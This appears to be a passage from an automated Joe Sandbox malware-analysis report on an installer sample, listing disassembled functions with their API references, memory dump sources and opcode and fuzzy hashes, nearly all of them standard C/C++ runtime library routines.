                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 427a95f39cc694b2eeba334d5c162e3c34c1cc9fe721b417f892e207e7bce04c
                            • Instruction ID: d0f61bd41862f272808859b0edfdb9a579bc5336b467dae22628202d5628839b
                            • Opcode Fuzzy Hash: 427a95f39cc694b2eeba334d5c162e3c34c1cc9fe721b417f892e207e7bce04c
                            • Instruction Fuzzy Hash: 2EF08C38711119FBDF11AB60DC0DB9EBBBCFB0135AF110066A810B2464CF388A91EB90
                            Function 6C0FAA17 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog3.LIBCMT ref: 6C0FAA1E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C0FAA29
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0FAA97
                              • Part of subcall function 6C0FA920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0FA938
                            • std::locale::_Setgloballocale.LIBCPMT ref: 6C0FAA44
                            • _Yarn.LIBCPMT ref: 6C0FAA5A
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: b9cd46547c1e4a6d88c5db77254c43a4c59048f23d59b2e1097891d79fbfd52b
                            • Instruction ID: becbe4a580806206a2f33c22498d37955f21bba1d5584976f4ca3ed3f9718e03
                            • Opcode Fuzzy Hash: b9cd46547c1e4a6d88c5db77254c43a4c59048f23d59b2e1097891d79fbfd52b
                            • Instruction Fuzzy Hash: D1019A79B102109BCB06DB208854ABD7BF1FF85248B280149DC2117B80DF38AA8BDBC1
                            Function 6C179E3F Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 452COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 98e67972a09fbb7ef98819dc0d08e1c42791de3b081c8603383b0f21b3dafcd6
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: 17127A74E06249DFCB24CFA4C4A0ADDBBB1FF09308F14946AE445ABB51DB35E949CB60
                            Function 6C145B91 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: 927f5817be227f32f65d6eadc70fc86c5c4baa0bc101835cd90a1397a2bec0e6
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 3AB11BB1E01209DFCB14CF95C890AAEFBB5FF58318F60852EE516A7B50D734AA45CB90
                            Function 6BFC2020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 6C0FAA17: __EH_prolog3.LIBCMT ref: 6C0FAA1E
                              • Part of subcall function 6C0FAA17: std::_Lockit::_Lockit.LIBCPMT ref: 6C0FAA29
                              • Part of subcall function 6C0FAA17: std::locale::_Setgloballocale.LIBCPMT ref: 6C0FAA44
                              • Part of subcall function 6C0FAA17: _Yarn.LIBCPMT ref: 6C0FAA5A
                              • Part of subcall function 6C0FAA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0FAA97
                              • Part of subcall function 6BFC2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2F95
                              • Part of subcall function 6BFC2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2FAF
                              • Part of subcall function 6BFC2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC2FD0
                              • Part of subcall function 6BFC2F60: __Getctype.LIBCPMT ref: 6BFC3084
                              • Part of subcall function 6BFC2F60: std::_Facet_Register.LIBCPMT ref: 6BFC309C
                              • Part of subcall function 6BFC2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC30B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6BFC211B
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3332196525-1866435925
                            • Opcode ID: 7e745c183428bb51baccc77f65456b26d8861472e0b08c2d3e626b8e683650f0
                            • Instruction ID: c6e553cbb9832090ed72db4f7f517f57b6278d65dfc3e0a2f3fbab858bd9932f
                            • Opcode Fuzzy Hash: 7e745c183428bb51baccc77f65456b26d8861472e0b08c2d3e626b8e683650f0
                            • Instruction Fuzzy Hash: BD41B1B5E0030A8FDB00CF64C8457AFBBB4FF48314F105268E919AB391E779A985CB91
                            Function 6C1491D6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $CK$CK
                            • API String ID: 3519838083-2957773085
                            • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                            • Instruction ID: dd22f5a6a96bd4a509f916abc39a2569ff408c1559cd8803439da03b42f88c35
                            • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                            • Instruction Fuzzy Hash: 8A21A471E41205CBCB04DFE8C5A06EEF7BAFF95318F14862AC512A7B91C7785A06CA91
                            Function 6C160584 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$LrJ$x
                            • API String ID: 3519838083-658305261
                            • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                            • Instruction ID: 2820798c55a440ccbad3c288336e0539861c48521a970c826cdd6e5723353e78
                            • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                            • Instruction Fuzzy Hash: 1F217936D01119DADF04DBD8C9A0BEEB7B5EF98308F20005AD50173B40DB799E58CBA5
                            Function 6C157EC7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C157ECC
                              • Part of subcall function 6C14258A: __EH_prolog.LIBCMT ref: 6C14258F
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            • API String ID: 3519838083-2437443688
                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction ID: d90654b4fbbbd8d94d41aebfef8aa00a187d05c6e98c37e22957c42ae7664043
                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                            • Instruction Fuzzy Hash: 7821E9B0801B40CFC760DF6AC14428ABBF4FF2A708B00C95EC0AA97B11D7B8A649CF55
                            Function 6C10E480 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C10E7C0,6BFC1DEA,00008000,6C10E7C0,?,?,?,6C10E36F,6C10E7C0,?,00000000,6BFC1DEA), ref: 6C10E4B9
                            • GetLastError.KERNEL32(?,?,?,6C10E36F,6C10E7C0,?,00000000,6BFC1DEA,?,6C117D8E,6C10E7C0,000000FF,000000FF,00000002,00008000,6C10E7C0), ref: 6C10E4C3
                            • __dosmaperr.LIBCMT ref: 6C10E4CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            • API String ID: 2336955059-4022487301
                            • Opcode ID: 13f1ce42dfd6b3b80fd8578b191daae8db446bae1ebe6b08b85317547c2178e8
                            • Instruction ID: 99295ad6e5447f51b67e958f119191100cd9cfeb14a3370b1bf8c7bed04f6a26
                            • Opcode Fuzzy Hash: 13f1ce42dfd6b3b80fd8578b191daae8db446bae1ebe6b08b85317547c2178e8
                            • Instruction Fuzzy Hash: 48012432714515ABCB058F6ACC04D9E3B2DEF86334B290209E860DB680EE75EA4187E0
                            Function 6C14ED0E Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: <J$DJ$HJ$TJ$]
                            • API String ID: 0-686860805
                            • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                            • Instruction ID: 394f62aaa74de841376df748137cc39ce5b9fdcbb5fb0d44ad2232e9b2ad2a66
                            • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                            • Instruction Fuzzy Hash: A5419F70C05299AFCF14DFA0D890DEEF770AF21308B60C569D16567A50EB39A78ACB91
                            Function 6C149331 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            • API String ID: 3732870572-0
                            • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                            • Instruction ID: 33edd2e751c74d7442d82e13021abb7ee629af1ee577f18a601c3ee4bf42f929
                            • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                            • Instruction Fuzzy Hash: D5119076600204BFEB218EA5CC50FAF7BBEEBDA754F00C42DB28156A90CA71AC14D760
                            Function 6C1080A2 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000008,?,00000000,6C10BB43), ref: 6C1080A7
                            • _free.LIBCMT ref: 6C108104
                            • _free.LIBCMT ref: 6C10813A
                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6C108145
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            • API String ID: 2283115069-0
                            • Opcode ID: 015e894cf3b27cb0c6891900443be998251289317cccf88d988d9eeec06fb2bb
                            • Instruction ID: d05741ba4794f300b5da28b46d374a315b9c47d7ec7a9873d38de2a794962ff7
                            • Opcode Fuzzy Hash: 015e894cf3b27cb0c6891900443be998251289317cccf88d988d9eeec06fb2bb
                            • Instruction Fuzzy Hash: A411E9B2309205BFFB116A799C84F9F22A9AFD337CB250636F23596AC1DF758C065250
                            Function 6C1195AA Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6C117DDC,00000000,00000000,?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0), ref: 6C1195C1
                            • GetLastError.KERNEL32(?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?,6C10E7C0,?,6C10F40C,6C1191A6), ref: 6C1195CD
                              • Part of subcall function 6C11961E: CloseHandle.KERNEL32(FFFFFFFE,6C1195DD,?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?,6C10E7C0), ref: 6C11962E
                            • ___initconout.LIBCMT ref: 6C1195DD
                              • Part of subcall function 6C1195FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C11959B,6C11822E,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?), ref: 6C119612
                            • WriteConsoleW.KERNEL32(00000000,?,6C117DDC,00000000,?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?), ref: 6C1195F2
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: f558fb16cf012683cb73fcb1a155b210292991aba0c74ebb2204c5b980e9efa1
                            • Instruction ID: 706f84463956f724c31f1daa0e8acac14d017654506b0029f369adae22f26a9d
                            • Opcode Fuzzy Hash: f558fb16cf012683cb73fcb1a155b210292991aba0c74ebb2204c5b980e9efa1
                            • Instruction Fuzzy Hash: E8F01C36204119BBCF121F91CC54ACA3F76FB4A7B1F044021FA2995A20DA368860EBD1
                            Function 6C131072 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 398COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C131077
                              • Part of subcall function 6C130FF5: __EH_prolog.LIBCMT ref: 6C130FFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: :$\
                            • API String ID: 3519838083-1166558509
                            • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                            • Instruction ID: 22c2656e986064beb3d0c36fb70129887c5acff4237b0a2fbe2ba985690f473c
                            • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                            • Instruction Fuzzy Hash: ECE1C434900225DACF11DFA4C890BDDB7B1BF2631CF20A119D45E6BA90DB79E58DCB51
                            Function 6C17D354 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 234COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog__aullrem
                            • String ID: d%K
                            • API String ID: 3415659256-3110269457
                            • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                            • Instruction ID: 3a86218f26b3f9335e67ba989a23f580b4eb0744fb8e6d141930d8dc2ddad6bb
                            • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                            • Instruction Fuzzy Hash: 3C81DE71A0020C9BDF20EF58C890BDEB7F5AF9435CF248059E859ABA40D735EA45CBB1
                            Function 6C106814 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            • API String ID: 2427045233-4022487301
                            • Opcode ID: 379c68c44f9356a3fccef50d0e5349a36dd75cd6ba8552ae16cf17b63b559225
                            • Instruction ID: 462b9eb8a3844836daaeb74739e758b237c48bec64c779c6f9bb485d62ec04da
                            • Opcode Fuzzy Hash: 379c68c44f9356a3fccef50d0e5349a36dd75cd6ba8552ae16cf17b63b559225
                            • Instruction Fuzzy Hash: AE71C374E4521EDBDB109F95C841BEE7AB5BF55318F24822AEC20A7B40DF7588C5CB60
                            Function 6C156C20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 224COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$hfJ
                            • API String ID: 3519838083-1391159562
                            • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                            • Instruction ID: be10b1a6ed1d1e67a882e363f855ec455114e775e3e2b4c04251eb07390f0f85
                            • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                            • Instruction Fuzzy Hash: 299116B0910218DFCB10DFA9C894ADEBBB4FF18308F94451EE45AE7B90D774AA48CB50
                            Function 6C14BC58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C14BC5D
                              • Part of subcall function 6C14A61A: __EH_prolog.LIBCMT ref: 6C14A61F
                              • Part of subcall function 6C14AA2E: __EH_prolog.LIBCMT ref: 6C14AA33
                              • Part of subcall function 6C14BEA5: __EH_prolog.LIBCMT ref: 6C14BEAA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            • API String ID: 3519838083-1089469559
                            • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction ID: b62c2fbb46b7605eae730539721de60c365478bc041f050521439cdff089b330
                            • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                            • Instruction Fuzzy Hash: 25816875D00558DFCF15DFA8C990BDDBBB4AF19308F1080AAE51267790DB34AA49CBA1
                            Function 6BFC28E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6BFC2A76
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmpDownload File
